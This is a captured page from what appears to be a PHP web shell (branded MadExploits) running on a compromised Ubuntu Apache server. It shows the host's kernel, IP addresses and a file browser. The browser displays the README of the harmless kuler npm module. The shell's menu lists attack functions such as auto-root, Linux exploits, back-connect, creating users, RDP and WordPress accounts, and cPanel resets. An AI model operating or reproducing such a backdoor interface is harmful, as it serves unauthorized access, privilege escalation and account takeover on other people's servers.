Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
kuler /
[ HOME SHELL ]
Name
Size
Permission
Action
.travis.yml
51
B
-rw-rw-r--
LICENSE
1.03
KB
-rw-rw-r--
README.md
903
B
-rw-rw-r--
index.js
2.5
KB
-rw-rw-r--
package.json
645
B
-rw-rw-r--
test.js
883
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# kuler Kuler is small and nifty node module that allows you to create terminal based colors using hex color codes, just like you're used to doing in your CSS. We're in a modern world now and terminals support more than 16 colors so we are stupid to not take advantage of this. ## Installation The package is released in the public npm registry and can be installed by running: ``` npm install --save kuler ``` ## Usage To color a string simply pass it the string you want to have colored as first argument and the color as hex as second argument: ```js 'use strict'; const kuler = require('kuler'); const str = kuler('foo', '#FF6600'); ``` The color code sequence is automatically terminated at the end of the string so the colors do no bleed to other pieces of text. So doing: ```js console.log(kuler('red', '#F00'), 'normal'); ``` Will work without any issues. ## License [MIT](LICENSE)
Close